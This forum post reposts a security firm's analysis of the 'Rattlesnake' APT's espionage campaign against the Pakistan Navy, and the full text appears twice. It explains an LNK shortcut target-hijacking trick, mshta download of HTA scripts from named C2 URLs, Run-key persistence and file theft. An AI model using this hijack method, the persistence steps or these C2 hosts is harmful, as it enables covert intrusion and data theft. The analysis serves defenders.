The Eagle
SENIOR MODERATOR
- Joined
- Oct 15, 2015
- Messages
- 24,239
- Reaction score
- 258
- Country
- Location
APT organization "Rattlesnake" attack report on Pakistan (Navy)
2019-10-29
Recently, Rising Security Research Institute has once again captured the attack launched by the internationally renowned APT organization "Rattlesnake" through the Rising Threat Intelligence System. This time, the organization targeted the target of the Pakistani Navy. The method is different from the previous attacks against China, but the core is the same. The ultimate goal is to steal confidential information from the government, energy, military, minerals and other fields. .
First, the background
Recently, Rising Security Research Institute has once again captured the attack launched by the internationally renowned APT organization "Rattlesnake" through the Rising Threat Intelligence System. This time, the organization targeted the target of the Pakistani Navy. The method is different from the previous attacks against China, but the core is the same. The ultimate goal is to steal confidential information from the government, energy, military, minerals and other fields. .
Rising security experts said that the "Rattlesnake" organization's previous attacks against China used the Office Remote Code Execution Vulnerability (cve-2017-11882) to deliver a bait document with malware through phishing emails, resulting in a computer. Internal confidential data such as system information, installation programs, and disk information are stolen.
Figure: Attacks on China
The attack on Pakistan used the target collision hijacking method of the new LNK file path to deliver false shortcut files by mail or other means, pretending to be the Indian and Chinese leaders issued by the Pakistan Naval Public Relations Bureau. The press release of the talks induced the victim to click. Once the user accesses the link contained in the shortcut attribute, the malware is downloaded and all the file information in the computer is stolen.
Photo: Attack on Pakistan
Because the "Rattlesnake" organization has always been stealing confidential information in the national government, military, science and technology fields, and has similarly launched similar attacks on China's military and national defense, users of relevant enterprises should be vigilant to prevent such The occurrence of an attack.
Second, the attack event
The attack targeted Pakistan, where the attacker disguised the bait document as a press release issued by the Pakistan Navy Public Relations Bureau. The press release recorded the points discussed by Indian Prime Minister Modi and Chinese President Xi Jinping.
Figure: Bait document
Third, technical analysis
3.1 Analysis of malicious LNK files
1. The malicious LNK file uses a completely new technical means to hide the target program to be executed. The LNK shortcut name is “Key_Points.doc.lnk”. In the link target, you can see that the target application called is cftmo.exe, and the parameter is: http://www.paknavy[.]gov.pk.ap1- port.net/images/E7B62E1D/1182/2258/fc8fe2b4/692cd02.
Figure: "Rattlesnake" Shell Link File
However, in the actual running process, the Link file finally executes mshta.exe in System32, and executes the specified URL malicious script file through mshta download.
Figure: Link file execution mshta.exe
In view of the above behavior, Rising security personnel analyzed and found that the lnk file was constructed in a completely new way, hiding the real target program, which we call the target hijacking technology of the Link file path. The following is a detailed breakdown of the technology.
2.Link file path target hijacking
ShellLinkHeader:
The LNK file structure contains a ShellLinkHeader header that contains information such as identification information, timestamps, and the existence of an optional structure.
Struct ShellLinkHeader {
Uint32_t HeaderSize;
Uint32_t LinkCLSID[4];
Uint32_t LinkFlags;
Uint32_t FileAttributes;
Uint32_t CreationTime[2];
Uint32_t AccessTime[2];
Uint32_t WriteTime[2];
Uint32_t FileSize;
Uint32_t IconIndex;
Uint32_t ShowCommand;
Uint16_t HotKey;
Uint16_t Reserved1;
Uint32_t Reserved2;
Uint32_t Reserved3;
};
EnvironmentVariableDataBlock:
There is a LinkFlags member in the ShellLinkHeader structure, which specifies some information and some optional structure information of lnk. One HasExpString flag specifies whether the lnk holds the environment variable block EnviromentVariableDataBlock structure.
When the target program path of LNK contains an environment variable, the structure exists and holds a target program path with an environment variable.
LinkTargetIDList:
This structure specifies the target program path for the shortcut and consists of multiple IDLists.
The IDList is an array of structures that identify the source location of the namespace in which the target resides. The number is determined by the level of the target path, and the last IDList identifies the final executable name.
Figure: LinkTargetIDList structure
There are two important path related members under the IDList structure: PrimaryName and ExtraDataBlock. The IDList structure members are not described in detail in Microsoft's official documentation.
Target hijacking analysis:
When the analysis finds that the operating system displays the LNK shortcut attribute, the value of the target path is related to the HasExpString flag. When the HasExpString value is not set, the operating system will splicing the target path from the LinkTargetIDList, and if HasExpString is set, the operating system will read and expand the environment variable display from TargetUnicode under the EnviromentVariableDataBlock.
If HasExpString is set and TargetUnicode under EnviromentVariableDataBlock provides a target program that does not exist, when the lnk file double click is executed, the system will try to access LinkTargetIDList to get the path and try to determine whether the target program exists. If it exists, use the path for final execution. Target program. However, when the operating system right-clicks the property, it will use the program path specified in the EnviromentVariableDataBlock first, and will not judge whether the target program exists or not. This will result in the hijacking of the lnk target program.
However, such lnk file hijacking cannot be persisted. After the double-click execution, the system will clear the HasExpString in the lnk file, and the file path in the LNK attribute will use the actual target program pointed to in the LinkTargetIDList, resulting in the property in the attribute after double-clicking the LNK. The target program path was modified.
In the sample of the rattlesnake delivery we captured, it was found that the target path hijacking was not modified after the execution. We further analyzed that if you want to persist the hijacking you must also modify the PrimaryName value in the last item in the IDList array. Normally, the contents specified in the PrimaryName and ExtraDataBlock in the IDList array are the same. If the executable file name specified by PrimaryName is the same as the program name specified in EnviromentVariableDataBlock, the system will consider this to be a normal lnk file, and will not modify the lnk after execution. So as long as the program name pointed to by the path in the EnviromentVariableDataBlock is the same as the PrimaryName value in the last item of the IDList array and the program does not exist, the hijacking function is achieved.
3.Key_Points.doc.lnk file analysis
In the Link file used by this "Rattlesnake" APT, it tries to confuse the user through the camouflaged link path (%windir%\system32\cftmo.exe) to mask the link target that the system actually executes (%windir%\system32\ Mshta.exe).
Binary analysis shows that the link file has been added to the environment variable as a path, thus triggering the creation of ExtraData's extended structure EnvironmentVariableDataBlock. In this structure, TargetUnicode is also responsible for the display of the environment variable path under the Link property. The malicious Link file implements the masquerading effect of the external link attribute in the path with the environment variable by modifying the TargetUnicode field.
The link masquerading of the Link file can be directly implemented by modifying the TargetUnicode field, and the system will then access the ExtraData in the sIDList structure to obtain the actual execution path. The Shell Link used by the "Rattlesnake" also modified the PrimaryName so that the two fields are unified into cftmo.exe. When the system calls the Link file, the Link path checking mechanism persists the lnk target path hijacking when it knows that the PrimaryName is the same as the TargetUnicode.
Figure: Modified PrimaryName
The final implementation effect When viewing the file through the attribute, the link target of the Link file is a non-existent cftmo.exe, but the actual system can execute the mshta.exe process through the maliciously constructed Link file, and access the C&C download JavaScript script 692cd02. Hta.
Figure: "Disguise" Link
3.2 Sample analysis: 692cd02.hta
692cd02.hta is a JavaScript script file generated by the open source tool DotNetToJScript. The main function is to execute .NET DLL files in memory. The script first decrypts LinkZip.dll, and reflects the pink function in the DLL. It passes 4 parameters to the pink function. Parameter 1 is the URL to download file.hta, and parameter 2 is the URL to upload soft information and abnormal error. Parameter 3 is the content of the encrypted bait document, and parameter 4 is the name of the bait document.
Figure: Memory execution .NET dll
3.3 Sample Analysis: LinkZip.dll
LinkZip.dll is a .NET program that mainly downloads the executable file.hta and opens the bait document Key_Points.doc.
The following is the detailed process:
1. Decrypt the bait document data, name it Key_Points.doc, save it under %temp%, and open the bait document. If the above operation fails, the exception information is reported to the URL: http://www.paknavy.gov.pk.ap1-port.net/plugins/1182/2258/true/true/.
Figure: Open the bait document
Figure: Reporting exception information
2. Report the kill soft name and status to http://www.paknavy.gov.pk.ap1-port.net/plugins/1182/2258/true/true/.
Figure: Reporting killing soft
3. Visit the URL
Http://www.paknavy.gov.pk.ap1-port.net/cgi/b6c82f0f84/1182/2258/af0c8a9f/file.hta, get the file.hta data from it, and randomly name it in the %temp% directory. If the acquisition is successful, hta will be executed and deleted after execution. If it is not successful, repeat the access URL, the round-trip access limit is 10 times, more than 10 times to the website http://www.paknavy.gov.pk.ap1-port.net/plugins/1182/2258/true /true/ Reports the custom exception error message "File-not-Written".
Figure: Get file.hta data and execute
4. The attack methods used since the file.hta file are the same as those reported by Rising before attacking China.
Brief description of the attack process (for detailed attack analysis, please refer to http://it.rising.com.cn/dongtai/19639.html and http://it.rising.com.cn/dongtai/19655.html):
(1) file.hta is a JavaScript script generated by the open source DotNetToJscript tool. The main function is to decrypt the memory and execute the StInstall.dll file, and reflect the pin function in the DLL.
(2) The malicious operation in StInstall.dll is: 1 Create a working directory: %programdata%\CommonsFiles. 2 Copy the system file write.exe to the working directory, and release PROPSYS.dll in the working directory, randomly named .tmp and write.exe.config. 3 Create a self-starting item in Software\Microsoft\Windows\CurrentVersion\Run with the name Commons and the data item C:\ProgramData\ CommonsFiles \write.exe. 4 use white plus black means to malicious operation: run write.exe (white file) in the working directory, call PROPSYS.dll (black file) in the same directory.
(3) PROPSYS.dll is a .NET dll. Its main function is to load the random name .tmp under the same directory to achieve the purpose of stealing. Eventually the malicious program steals a lot of user data information. It integrates the stolen information in json format. The data content is stored in plain text in the %appdata%\CommonsDat directory. The four files with the .fls, .flc, .sif, and .err files are named: random string. + specific suffix.
Figure: stealing information files
The file with the suffix .fls records the file information of the suffixes doc, docx, xls, xlsx, pdf, ppt, pptx.
filePath File name and path
Complete File transfer
sentOffset File upload data size
Table: Information Record
The files with the suffix .sif are mainly stored with system permission information, system information, 4 system directory file lists, disk drive information, and system installation software list.
Figure: Information stored in the suffix .sif
The format of the system permission information is privileges":{"IsInAdminGroup":"Yes/NO","IsAdminPrivilege":"Yes/NO"}.
The system information record format of the victim machine is: "sysInfo": {system information}.
Detailed system information is shown in the following table:
Figure: System Information
Continued: 1/2
2019-10-29
Recently, Rising Security Research Institute has once again captured the attack launched by the internationally renowned APT organization "Rattlesnake" through the Rising Threat Intelligence System. This time, the organization targeted the target of the Pakistani Navy. The method is different from the previous attacks against China, but the core is the same. The ultimate goal is to steal confidential information from the government, energy, military, minerals and other fields. .
First, the background
Recently, Rising Security Research Institute has once again captured the attack launched by the internationally renowned APT organization "Rattlesnake" through the Rising Threat Intelligence System. This time, the organization targeted the target of the Pakistani Navy. The method is different from the previous attacks against China, but the core is the same. The ultimate goal is to steal confidential information from the government, energy, military, minerals and other fields. .
Rising security experts said that the "Rattlesnake" organization's previous attacks against China used the Office Remote Code Execution Vulnerability (cve-2017-11882) to deliver a bait document with malware through phishing emails, resulting in a computer. Internal confidential data such as system information, installation programs, and disk information are stolen.
Figure: Attacks on China
The attack on Pakistan used the target collision hijacking method of the new LNK file path to deliver false shortcut files by mail or other means, pretending to be the Indian and Chinese leaders issued by the Pakistan Naval Public Relations Bureau. The press release of the talks induced the victim to click. Once the user accesses the link contained in the shortcut attribute, the malware is downloaded and all the file information in the computer is stolen.
Photo: Attack on Pakistan
Because the "Rattlesnake" organization has always been stealing confidential information in the national government, military, science and technology fields, and has similarly launched similar attacks on China's military and national defense, users of relevant enterprises should be vigilant to prevent such The occurrence of an attack.
Second, the attack event
The attack targeted Pakistan, where the attacker disguised the bait document as a press release issued by the Pakistan Navy Public Relations Bureau. The press release recorded the points discussed by Indian Prime Minister Modi and Chinese President Xi Jinping.
Figure: Bait document
Third, technical analysis
3.1 Analysis of malicious LNK files
1. The malicious LNK file uses a completely new technical means to hide the target program to be executed. The LNK shortcut name is “Key_Points.doc.lnk”. In the link target, you can see that the target application called is cftmo.exe, and the parameter is: http://www.paknavy[.]gov.pk.ap1- port.net/images/E7B62E1D/1182/2258/fc8fe2b4/692cd02.
Figure: "Rattlesnake" Shell Link File
However, in the actual running process, the Link file finally executes mshta.exe in System32, and executes the specified URL malicious script file through mshta download.
Figure: Link file execution mshta.exe
In view of the above behavior, Rising security personnel analyzed and found that the lnk file was constructed in a completely new way, hiding the real target program, which we call the target hijacking technology of the Link file path. The following is a detailed breakdown of the technology.
2.Link file path target hijacking
ShellLinkHeader:
The LNK file structure contains a ShellLinkHeader header that contains information such as identification information, timestamps, and the existence of an optional structure.
Struct ShellLinkHeader {
Uint32_t HeaderSize;
Uint32_t LinkCLSID[4];
Uint32_t LinkFlags;
Uint32_t FileAttributes;
Uint32_t CreationTime[2];
Uint32_t AccessTime[2];
Uint32_t WriteTime[2];
Uint32_t FileSize;
Uint32_t IconIndex;
Uint32_t ShowCommand;
Uint16_t HotKey;
Uint16_t Reserved1;
Uint32_t Reserved2;
Uint32_t Reserved3;
};
EnvironmentVariableDataBlock:
There is a LinkFlags member in the ShellLinkHeader structure, which specifies some information and some optional structure information of lnk. One HasExpString flag specifies whether the lnk holds the environment variable block EnviromentVariableDataBlock structure.
When the target program path of LNK contains an environment variable, the structure exists and holds a target program path with an environment variable.
LinkTargetIDList:
This structure specifies the target program path for the shortcut and consists of multiple IDLists.
The IDList is an array of structures that identify the source location of the namespace in which the target resides. The number is determined by the level of the target path, and the last IDList identifies the final executable name.
Figure: LinkTargetIDList structure
There are two important path related members under the IDList structure: PrimaryName and ExtraDataBlock. The IDList structure members are not described in detail in Microsoft's official documentation.
Target hijacking analysis:
When the analysis finds that the operating system displays the LNK shortcut attribute, the value of the target path is related to the HasExpString flag. When the HasExpString value is not set, the operating system will splicing the target path from the LinkTargetIDList, and if HasExpString is set, the operating system will read and expand the environment variable display from TargetUnicode under the EnviromentVariableDataBlock.
If HasExpString is set and TargetUnicode under EnviromentVariableDataBlock provides a target program that does not exist, when the lnk file double click is executed, the system will try to access LinkTargetIDList to get the path and try to determine whether the target program exists. If it exists, use the path for final execution. Target program. However, when the operating system right-clicks the property, it will use the program path specified in the EnviromentVariableDataBlock first, and will not judge whether the target program exists or not. This will result in the hijacking of the lnk target program.
However, such lnk file hijacking cannot be persisted. After the double-click execution, the system will clear the HasExpString in the lnk file, and the file path in the LNK attribute will use the actual target program pointed to in the LinkTargetIDList, resulting in the property in the attribute after double-clicking the LNK. The target program path was modified.
In the sample of the rattlesnake delivery we captured, it was found that the target path hijacking was not modified after the execution. We further analyzed that if you want to persist the hijacking you must also modify the PrimaryName value in the last item in the IDList array. Normally, the contents specified in the PrimaryName and ExtraDataBlock in the IDList array are the same. If the executable file name specified by PrimaryName is the same as the program name specified in EnviromentVariableDataBlock, the system will consider this to be a normal lnk file, and will not modify the lnk after execution. So as long as the program name pointed to by the path in the EnviromentVariableDataBlock is the same as the PrimaryName value in the last item of the IDList array and the program does not exist, the hijacking function is achieved.
3.Key_Points.doc.lnk file analysis
In the Link file used by this "Rattlesnake" APT, it tries to confuse the user through the camouflaged link path (%windir%\system32\cftmo.exe) to mask the link target that the system actually executes (%windir%\system32\ Mshta.exe).
Binary analysis shows that the link file has been added to the environment variable as a path, thus triggering the creation of ExtraData's extended structure EnvironmentVariableDataBlock. In this structure, TargetUnicode is also responsible for the display of the environment variable path under the Link property. The malicious Link file implements the masquerading effect of the external link attribute in the path with the environment variable by modifying the TargetUnicode field.
The link masquerading of the Link file can be directly implemented by modifying the TargetUnicode field, and the system will then access the ExtraData in the sIDList structure to obtain the actual execution path. The Shell Link used by the "Rattlesnake" also modified the PrimaryName so that the two fields are unified into cftmo.exe. When the system calls the Link file, the Link path checking mechanism persists the lnk target path hijacking when it knows that the PrimaryName is the same as the TargetUnicode.
Figure: Modified PrimaryName
The final implementation effect When viewing the file through the attribute, the link target of the Link file is a non-existent cftmo.exe, but the actual system can execute the mshta.exe process through the maliciously constructed Link file, and access the C&C download JavaScript script 692cd02. Hta.
Figure: "Disguise" Link
3.2 Sample analysis: 692cd02.hta
692cd02.hta is a JavaScript script file generated by the open source tool DotNetToJScript. The main function is to execute .NET DLL files in memory. The script first decrypts LinkZip.dll, and reflects the pink function in the DLL. It passes 4 parameters to the pink function. Parameter 1 is the URL to download file.hta, and parameter 2 is the URL to upload soft information and abnormal error. Parameter 3 is the content of the encrypted bait document, and parameter 4 is the name of the bait document.
Figure: Memory execution .NET dll
3.3 Sample Analysis: LinkZip.dll
LinkZip.dll is a .NET program that mainly downloads the executable file.hta and opens the bait document Key_Points.doc.
The following is the detailed process:
1. Decrypt the bait document data, name it Key_Points.doc, save it under %temp%, and open the bait document. If the above operation fails, the exception information is reported to the URL: http://www.paknavy.gov.pk.ap1-port.net/plugins/1182/2258/true/true/.
Figure: Open the bait document
Figure: Reporting exception information
2. Report the kill soft name and status to http://www.paknavy.gov.pk.ap1-port.net/plugins/1182/2258/true/true/.
Figure: Reporting killing soft
3. Visit the URL
Http://www.paknavy.gov.pk.ap1-port.net/cgi/b6c82f0f84/1182/2258/af0c8a9f/file.hta, get the file.hta data from it, and randomly name it in the %temp% directory. If the acquisition is successful, hta will be executed and deleted after execution. If it is not successful, repeat the access URL, the round-trip access limit is 10 times, more than 10 times to the website http://www.paknavy.gov.pk.ap1-port.net/plugins/1182/2258/true /true/ Reports the custom exception error message "File-not-Written".
Figure: Get file.hta data and execute
4. The attack methods used since the file.hta file are the same as those reported by Rising before attacking China.
Brief description of the attack process (for detailed attack analysis, please refer to http://it.rising.com.cn/dongtai/19639.html and http://it.rising.com.cn/dongtai/19655.html):
(1) file.hta is a JavaScript script generated by the open source DotNetToJscript tool. The main function is to decrypt the memory and execute the StInstall.dll file, and reflect the pin function in the DLL.
(2) The malicious operation in StInstall.dll is: 1 Create a working directory: %programdata%\CommonsFiles. 2 Copy the system file write.exe to the working directory, and release PROPSYS.dll in the working directory, randomly named .tmp and write.exe.config. 3 Create a self-starting item in Software\Microsoft\Windows\CurrentVersion\Run with the name Commons and the data item C:\ProgramData\ CommonsFiles \write.exe. 4 use white plus black means to malicious operation: run write.exe (white file) in the working directory, call PROPSYS.dll (black file) in the same directory.
(3) PROPSYS.dll is a .NET dll. Its main function is to load the random name .tmp under the same directory to achieve the purpose of stealing. Eventually the malicious program steals a lot of user data information. It integrates the stolen information in json format. The data content is stored in plain text in the %appdata%\CommonsDat directory. The four files with the .fls, .flc, .sif, and .err files are named: random string. + specific suffix.
Figure: stealing information files
The file with the suffix .fls records the file information of the suffixes doc, docx, xls, xlsx, pdf, ppt, pptx.
filePath File name and path
Complete File transfer
sentOffset File upload data size
Table: Information Record
The files with the suffix .sif are mainly stored with system permission information, system information, 4 system directory file lists, disk drive information, and system installation software list.
Figure: Information stored in the suffix .sif
The format of the system permission information is privileges":{"IsInAdminGroup":"Yes/NO","IsAdminPrivilege":"Yes/NO"}.
The system information record format of the victim machine is: "sysInfo": {system information}.
Detailed system information is shown in the following table:
Figure: System Information
Continued: 1/2
Last edited:
